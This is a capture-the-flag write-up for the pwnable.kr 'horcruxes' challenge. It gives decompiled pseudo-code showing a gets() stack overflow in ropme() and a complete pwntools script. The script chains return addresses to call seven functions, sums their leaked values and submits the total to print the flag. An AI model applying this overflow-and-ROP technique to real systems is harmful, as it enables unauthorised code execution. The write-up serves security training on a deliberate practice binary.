pwnable.kr —— horcruxes

question#

Voldemort concealed his split soul inside 7 horcruxes.
Find all horcruxes, and ROP it!
author: jiwon choi

ssh horcruxes@pwnable.kr -p2222 (pw:guest)

analyse#

IDA打开看到ropme函数

/* IDA pseudo-code of the challenge's menu handler (shown as decompiled, not fixed).
 * Reads a menu number; when it equals one of the globals a..g the matching
 * horcrux function A()..G() is called. Any other number falls through to the
 * "EXP" prompt, and the flag is printed only when atoi(answer) == the global sum.
 * The EXP answer is read with gets() into a 100-byte stack buffer, so the saved
 * return address (0x74 + 4 bytes above s) can be overwritten -- this is the
 * ROP entry point the rest of the page uses. a..g and sum are defined outside
 * this listing. */
int ropme()
{
char s[100]; // [esp+4h] [ebp-74h] -- 100-byte buffer; ebp-0x74 puts the saved return address 0x78 bytes past its start
int v2; // [esp+68h] [ebp-10h] -- menu choice; sits directly after s on the stack
int fd; // [esp+6Ch] [ebp-Ch]

printf("Select Menu:");
__isoc99_scanf("%d", &v2);
getchar(); // swallow the newline left by scanf so the later gets() reads the next line
if ( v2 == a )
{
A();
}
else if ( v2 == b )
{
B();
}
else if ( v2 == c )
{
C();
}
else if ( v2 == d )
{
D();
}
else if ( v2 == e )
{
E();
}
else if ( v2 == f )
{
F();
}
else if ( v2 == g )
{
G();
}
else
{
printf("How many EXP did you earned? : ");
gets(s); // unbounded read: stack buffer overflow -> control of the return address
if ( atoi(s) == sum )
{
fd = open("flag", 0); // return value is not checked before read()
s[read(fd, s, 0x64u)] = 0; // read() result used unchecked as an index: -1 writes s[-1], 100 writes s[100] (low byte of v2)
puts(s);
close(fd);
exit(0);
}
puts("You'd better get more experience to kill Voldemort");
}
return 0; // normal return -> the overwritten return address is popped here
}

在gets中存在栈溢出（s 位于 ebp-0x74，填充 0x74+4 字节即可覆盖返回地址）。题目是要知道A+B+C+D+E+F+G的值，等于sum即可，而sum本身不会被打印，所以我们只要通过ROP，分别执行A、B、C、D、E、F、G（每个函数会打印自己的EXP值），最后再执行ropme，输入这些值的和

get flag#

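from pwn import *
import re

# Each horcrux function A()..G() prints a line containing "(EXP +N)".
# The original script extracted the number and fed it to eval(), which
# executes whatever text the target process sends back; a controlled or
# modified binary could turn that into code execution on the attacker's
# box.  A decimal regex + int() is all that is needed here.
EXP_RE = re.compile(br'\+(-?\d+)\)')


def parse_exp_total(output, expected=7):
    """Sum the EXP values printed by the horcrux functions.

    Args:
        output: raw bytes received from the target after the ROP chain ran.
        expected: number of EXP lines that must be present (one per horcrux).

    Returns:
        The integer sum of the parsed values.

    Raises:
        ValueError: if a different number of EXP lines was found, so a
            partial or garbled run is not silently submitted as the answer.
    """
    values = [int(v) for v in EXP_RE.findall(output)]
    if len(values) != expected:
        raise ValueError('expected %d EXP lines, parsed %d from %r'
                         % (expected, len(values), output))
    return sum(values)


def main():
    """Run the ROP chain A()..G() -> ropme() and submit the summed EXP."""
    context.log_level = 'debug'
    p = process('horcruxes')
    elf = ELF('horcruxes')

    # One call per horcrux; return-into-function chaining needs no gadgets
    # because each function takes no arguments.
    horcruxes = [elf.symbols[name] for name in 'ABCDEFG']
    # The original looked up elf.symbols['ropme'] and then discarded it in
    # favour of this constant.  Presumably the symbol address contains a
    # byte that gets() treats as a line terminator (0x0a), so a nearby
    # address is used instead -- TODO confirm against the binary before
    # changing it.
    ropme = 0x809fffc

    # s[100] sits at ebp-0x74: 0x74 bytes of padding plus 4 for the saved
    # ebp reach the saved return address.
    payload = b'a' * (0x74 + 4)
    payload += b''.join(p32(addr) for addr in horcruxes) + p32(ropme)

    # Any menu value that matches none of a..g falls through to gets().
    p.sendline(b'1')
    p.recvuntil(b'How many EXP did you earned? : ')
    p.sendline(payload)

    # The chain runs A()..G(), each printing its EXP line, then re-enters
    # ropme(), whose "Select Menu:" prompt marks the end of the output.
    output = p.recvuntil(b'Select Menu:')
    total = parse_exp_total(output)
    print(total)

    p.sendline(b'1')
    p.recvuntil(b'How many EXP did you earned? : ')
    p.sendline(str(total).encode())
    p.interactive()


if __name__ == '__main__':
    main()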
